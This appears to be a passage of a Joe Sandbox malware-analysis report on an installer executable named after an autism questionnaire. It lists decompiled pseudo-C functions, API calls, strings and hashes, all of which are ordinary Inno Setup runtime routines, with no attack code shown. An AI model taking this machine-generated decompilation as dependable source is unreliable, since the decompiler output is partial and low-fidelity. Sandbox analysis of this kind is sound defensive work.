                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                              • String ID:
                                                                                              • API String ID: 351091851-0
                                                                                              • Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                                              • Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
                                                                                              • Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                                              • Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004AFA44, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 34%
                                                                                              			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void* _t24;
				intOrPtr _t28;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_push(0);
				_push(0);
				_t24 = __eax;
				_push(_t35);
				_push(0x4aface);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				if(( *0x4c1d61 & 0x00000001) == 0) {
					E00407A20( &_v8);
				} else {
					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
				}
				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
				_push(_v8);
				_push(_t24);
				_push(0x4b0f94);
				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
				E004087C4( &_v12, _t24, 5, _t31, _t32);
				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E004AFAD5);
				return E00407A80( &_v12, 2);
			}










                                                                                              0x004afa44
                                                                                              0x004afa44
                                                                                              0x004afa47
                                                                                              0x004afa49
                                                                                              0x004afa4c
                                                                                              0x004afa50
                                                                                              0x004afa51
                                                                                              0x004afa56
                                                                                              0x004afa59
                                                                                              0x004afa63
                                                                                              0x004afa77
                                                                                              0x004afa65
                                                                                              0x004afa6d
                                                                                              0x004afa6d
                                                                                              0x004afa7c
                                                                                              0x004afa81
                                                                                              0x004afa84
                                                                                              0x004afa85
                                                                                              0x004afa8a
                                                                                              0x004afa97
                                                                                              0x004afaae
                                                                                              0x004afab5
                                                                                              0x004afab8
                                                                                              0x004afabb
                                                                                              0x004afacd

                                                                                              APIs
                                                                                              • MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                                              Strings
                                                                                              • For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A
                                                                                              • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
                                                                                              • Setup, xrefs: 004AFA9E
                                                                                              • /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message
                                                                                              • String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
                                                                                              • API String ID: 2030045667-3391638011
                                                                                              • Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                                              • Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
                                                                                              • Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                                              • Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042F9B8, Relevance: 7.8, APIs: 5, Instructions: 335COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 69%
                                                                                              			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed int _v8;
				signed char _v9;
				signed int _v12;
				signed int _v14;
				void* _v20;
				void* _v24;
				signed short* _v28;
				signed short* _v32;
				signed int _v48;
				void* __ebx;
				void* __ebp;
				signed int _t150;
				signed int _t272;
				intOrPtr _t328;
				intOrPtr _t331;
				intOrPtr _t339;
				intOrPtr _t347;
				intOrPtr _t355;
				void* _t360;
				void* _t362;
				intOrPtr _t363;

				_t367 = __fp0;
				_t358 = __edi;
				_t360 = _t362;
				_t363 = _t362 + 0xffffffd4;
				_v8 = __ecx;
				_v32 = __edx;
				_v28 = __eax;
				_v9 = 1;
				_t272 =  *_v28 & 0x0000ffff;
				if((_t272 & 0x00000fff) >= 0x10f) {
					_t150 =  *_v32 & 0x0000ffff;
					if(_t150 != 0) {
						if(_t150 != 1) {
							if(E00430860(_t272,  &_v20) != 0) {
								_push( &_v14);
								_t273 =  *_v20;
								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
									_t275 =  *_v32 & 0x0000ffff;
									if(( *_v32 & 0xfff) >= 0x10f) {
										if(E00430860(_t275,  &_v24) != 0) {
											_push( &_v12);
											_t276 =  *_v24;
											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
												E00428BF0(0xb);
												goto L41;
											} else {
												if(( *_v28 & 0x0000ffff) == _v12) {
													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
													goto L41;
												} else {
													_push( &_v48);
													L00427244();
													_push(_t360);
													_push(0x42fdb0);
													_push( *[fs:eax]);
													 *[fs:eax] = _t363;
													_t289 = _v12 & 0x0000ffff;
													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
													if((_v48 & 0x0000ffff) != _v12) {
														E00428AF8(_t289);
													}
													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
													_pop(_t328);
													 *[fs:eax] = _t328;
													_push(0x42fde5);
													return E00429278( &_v48);
												}
											}
										} else {
											E00428BF0(0xb);
											goto L41;
										}
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fcf7);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t294 =  *_v32 & 0x0000ffff;
										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
										if(( *_v32 & 0x0000ffff) != _v48) {
											E00428AF8(_t294);
										}
										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
										_pop(_t331);
										 *[fs:eax] = _t331;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								} else {
									if(( *_v32 & 0x0000ffff) == _v14) {
										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fc52);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t299 = _v14 & 0x0000ffff;
										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
										if((_v48 & 0x0000ffff) != _v14) {
											E00428AF8(_t299);
										}
										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
										_pop(_t339);
										 *[fs:eax] = _t339;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 2);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(0, 1);
						goto L41;
					}
				} else {
					if(_t272 != 0) {
						if(_t272 != 1) {
							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
								_push( &_v12);
								_t282 =  *_v24;
								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
									_push( &_v48);
									L00427244();
									_push(_t360);
									_push(0x42fb63);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_t306 =  *_v28 & 0x0000ffff;
									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
									if((_v48 & 0xfff) !=  *_v28) {
										E00428AF8(_t306);
									}
									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
									_pop(_t347);
									 *[fs:eax] = _t347;
									_push(0x42fde5);
									return E00429278( &_v48);
								} else {
									if(( *_v28 & 0x0000ffff) == _v12) {
										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42facc);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t311 = _v12 & 0x0000ffff;
										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
										if((_v48 & 0xfff) != _v12) {
											E00428AF8(_t311);
										}
										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
										_pop(_t355);
										 *[fs:eax] = _t355;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 0);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(1, 0);
						L41:
						return _v9 & 0x000000ff;
					}
				}
			}
























                                                                                              0x0042f9b8
                                                                                              0x0042f9b8
                                                                                              0x0042f9b9
                                                                                              0x0042f9bb
                                                                                              0x0042f9bf
                                                                                              0x0042f9c2
                                                                                              0x0042f9c5
                                                                                              0x0042f9c8
                                                                                              0x0042f9cf
                                                                                              0x0042f9dc
                                                                                              0x0042fb6d
                                                                                              0x0042fb73
                                                                                              0x0042fb8a
                                                                                              0x0042fbac
                                                                                              0x0042fbbb
                                                                                              0x0042fbc7
                                                                                              0x0042fbce
                                                                                              0x0042fc88
                                                                                              0x0042fc95
                                                                                              0x0042fd0a
                                                                                              0x0042fd19
                                                                                              0x0042fd25
                                                                                              0x0042fd2c
                                                                                              0x0042fde0
                                                                                              0x00000000
                                                                                              0x0042fd32
                                                                                              0x0042fd3c
                                                                                              0x0042fdd6
                                                                                              0x0042fddb
                                                                                              0x00000000
                                                                                              0x0042fd3e
                                                                                              0x0042fd41
                                                                                              0x0042fd42
                                                                                              0x0042fd49
                                                                                              0x0042fd4a
                                                                                              0x0042fd4f
                                                                                              0x0042fd52
                                                                                              0x0042fd55
                                                                                              0x0042fd5f
                                                                                              0x0042fd6c
                                                                                              0x0042fd6e
                                                                                              0x0042fd6e
                                                                                              0x0042fd92
                                                                                              0x0042fd97
                                                                                              0x0042fd9c
                                                                                              0x0042fd9f
                                                                                              0x0042fda2
                                                                                              0x0042fdaf
                                                                                              0x0042fdaf
                                                                                              0x0042fd3c
                                                                                              0x0042fd0c
                                                                                              0x0042fd0c
                                                                                              0x00000000
                                                                                              0x0042fd0c
                                                                                              0x0042fc97
                                                                                              0x0042fc9a
                                                                                              0x0042fc9b
                                                                                              0x0042fca2
                                                                                              0x0042fca3
                                                                                              0x0042fca8
                                                                                              0x0042fcab
                                                                                              0x0042fcb1
                                                                                              0x0042fcba
                                                                                              0x0042fcc9
                                                                                              0x0042fccb
                                                                                              0x0042fccb
                                                                                              0x0042fcde
                                                                                              0x0042fce3
                                                                                              0x0042fce6
                                                                                              0x0042fce9
                                                                                              0x0042fcf6
                                                                                              0x0042fcf6
                                                                                              0x0042fbd4
                                                                                              0x0042fbde
                                                                                              0x0042fc78
                                                                                              0x0042fc7d
                                                                                              0x00000000
                                                                                              0x0042fbe0
                                                                                              0x0042fbe3
                                                                                              0x0042fbe4
                                                                                              0x0042fbeb
                                                                                              0x0042fbec
                                                                                              0x0042fbf1
                                                                                              0x0042fbf4
                                                                                              0x0042fbf7
                                                                                              0x0042fc01
                                                                                              0x0042fc0e
                                                                                              0x0042fc10
                                                                                              0x0042fc10
                                                                                              0x0042fc34
                                                                                              0x0042fc39
                                                                                              0x0042fc3e
                                                                                              0x0042fc41
                                                                                              0x0042fc44
                                                                                              0x0042fc51
                                                                                              0x0042fc51
                                                                                              0x0042fbde
                                                                                              0x0042fbae
                                                                                              0x0042fbae
                                                                                              0x00000000
                                                                                              0x0042fbae
                                                                                              0x0042fb8c
                                                                                              0x0042fb98
                                                                                              0x00000000
                                                                                              0x0042fb98
                                                                                              0x0042fb75
                                                                                              0x0042fb7e
                                                                                              0x00000000
                                                                                              0x0042fb7e
                                                                                              0x0042f9e2
                                                                                              0x0042f9e5
                                                                                              0x0042f9fc
                                                                                              0x0042fa22
                                                                                              0x0042fa31
                                                                                              0x0042fa3d
                                                                                              0x0042fa44
                                                                                              0x0042fb02
                                                                                              0x0042fb03
                                                                                              0x0042fb0a
                                                                                              0x0042fb0b
                                                                                              0x0042fb10
                                                                                              0x0042fb13
                                                                                              0x0042fb19
                                                                                              0x0042fb22
                                                                                              0x0042fb35
                                                                                              0x0042fb37
                                                                                              0x0042fb37
                                                                                              0x0042fb4a
                                                                                              0x0042fb4f
                                                                                              0x0042fb52
                                                                                              0x0042fb55
                                                                                              0x0042fb62
                                                                                              0x0042fa4a
                                                                                              0x0042fa54
                                                                                              0x0042faf2
                                                                                              0x0042faf7
                                                                                              0x00000000
                                                                                              0x0042fa56
                                                                                              0x0042fa59
                                                                                              0x0042fa5a
                                                                                              0x0042fa61
                                                                                              0x0042fa62
                                                                                              0x0042fa67
                                                                                              0x0042fa6a
                                                                                              0x0042fa6d
                                                                                              0x0042fa77
                                                                                              0x0042fa88
                                                                                              0x0042fa8a
                                                                                              0x0042fa8a
                                                                                              0x0042faae
                                                                                              0x0042fab3
                                                                                              0x0042fab8
                                                                                              0x0042fabb
                                                                                              0x0042fabe
                                                                                              0x0042facb
                                                                                              0x0042facb
                                                                                              0x0042fa54
                                                                                              0x0042fa24
                                                                                              0x0042fa24
                                                                                              0x00000000
                                                                                              0x0042fa24
                                                                                              0x0042f9fe
                                                                                              0x0042fa0a
                                                                                              0x00000000
                                                                                              0x0042fa0a
                                                                                              0x0042f9e7
                                                                                              0x0042f9f0
                                                                                              0x0042fde5
                                                                                              0x0042fded
                                                                                              0x0042fded
                                                                                              0x0042f9e5

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                                              • Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
                                                                                              • Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                                              • Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041C790, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77threadCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 75%
                                                                                              			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				short _v536;
				short* _t32;
				intOrPtr* _t47;
				intOrPtr _t56;
				void* _t61;
				intOrPtr _t63;
				void* _t67;

				_v8 = 0;
				_t47 = __edx;
				_t61 = __eax;
				_push(_t67);
				_push(0x41c873);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				E00407A20(__edx);
				_v24 =  *(_a4 - 2) & 0x0000ffff;
				_v22 =  *(_a4 - 4) & 0x0000ffff;
				_v18 =  *(_a4 - 6) & 0x0000ffff;
				if(_t61 > 2) {
					E00407E48( &_v8, L"yyyy");
				} else {
					E00407E48( &_v8, 0x41c88c);
				}
				_t32 = E004084EC(_v8);
				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
					E0040858C(_t47, 0x100,  &_v536);
					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
						_t63 =  *_t47;
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 - 4));
						}
						E004088AC( *_t47, _t63 - 1, 2, _t47);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41c87a);
				return E00407A20( &_v8);
			}














                                                                                              0x0041c79d
                                                                                              0x0041c7a0
                                                                                              0x0041c7a2
                                                                                              0x0041c7a6
                                                                                              0x0041c7a7
                                                                                              0x0041c7ac
                                                                                              0x0041c7af
                                                                                              0x0041c7b4
                                                                                              0x0041c7c0
                                                                                              0x0041c7cb
                                                                                              0x0041c7d6
                                                                                              0x0041c7dd
                                                                                              0x0041c7f6
                                                                                              0x0041c7df
                                                                                              0x0041c7e7
                                                                                              0x0041c7e7
                                                                                              0x0041c80a
                                                                                              0x0041c823
                                                                                              0x0041c832
                                                                                              0x0041c838
                                                                                              0x0041c842
                                                                                              0x0041c846
                                                                                              0x0041c84b
                                                                                              0x0041c84b
                                                                                              0x0041c858
                                                                                              0x0041c858
                                                                                              0x0041c838
                                                                                              0x0041c85f
                                                                                              0x0041c862
                                                                                              0x0041c865
                                                                                              0x0041c872

                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
                                                                                              • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DateFormatLocaleThread
                                                                                              • String ID: $yyyy
                                                                                              • API String ID: 3303714858-404527807
                                                                                              • Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                                              • Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
                                                                                              • Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                                              • Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041EEFC, Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 85%
                                                                                              			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				intOrPtr _t55;
				signed int _t76;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;

				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x41f0a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
					_v12 = E0041EEF0(_t82);
				} else {
					_v12 = _t82 - _v1596.AllocationBase;
				}
				E0041A57C( &_v534, 0x104, E00420608() + 2);
				_t83 = 0x41f0bc;
				_t100 = 0x41f0bc;
				_t95 =  *0x414db8; // 0x414e10
				if(E00405F30(_t102, _t95) != 0) {
					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
					_t76 = E00407F04(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x41f0c0;
					}
				}
				_t55 =  *0x4ba774; // 0x40e708
				_t18 = _t55 + 4; // 0xffec
				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
				E00405BE8( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				E0041A814(4,  &_v1636);
				E00407F04(_v8);
				_pop(_t98);
				 *[fs:eax] = _t98;
				_push(0x41f0af);
				return E00407A20( &_v1640);
			}





























                                                                                              0x0041ef0a
                                                                                              0x0041ef10
                                                                                              0x0041ef13
                                                                                              0x0041ef15
                                                                                              0x0041ef19
                                                                                              0x0041ef1a
                                                                                              0x0041ef1f
                                                                                              0x0041ef22
                                                                                              0x0041ef2f
                                                                                              0x0041ef3e
                                                                                              0x0041ef6e
                                                                                              0x0041ef7a
                                                                                              0x0041ef7f
                                                                                              0x0041ef85
                                                                                              0x0041ef85
                                                                                              0x0041efa7
                                                                                              0x0041efac
                                                                                              0x0041efb1
                                                                                              0x0041efb8
                                                                                              0x0041efc5
                                                                                              0x0041efcf
                                                                                              0x0041efd3
                                                                                              0x0041efda
                                                                                              0x0041efe4
                                                                                              0x0041efe4
                                                                                              0x0041efda
                                                                                              0x0041eff5
                                                                                              0x0041effa
                                                                                              0x0041f009
                                                                                              0x0041f016
                                                                                              0x0041f021
                                                                                              0x0041f027
                                                                                              0x0041f034
                                                                                              0x0041f03a
                                                                                              0x0041f044
                                                                                              0x0041f04a
                                                                                              0x0041f051
                                                                                              0x0041f057
                                                                                              0x0041f05e
                                                                                              0x0041f064
                                                                                              0x0041f080
                                                                                              0x0041f088
                                                                                              0x0041f091
                                                                                              0x0041f094
                                                                                              0x0041f097
                                                                                              0x0041f0a7

                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                                              • LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3990497365-0
                                                                                              • Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                                              • Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
                                                                                              • Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                                              • Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A6C8, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 58%
                                                                                              			E0040A6C8(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
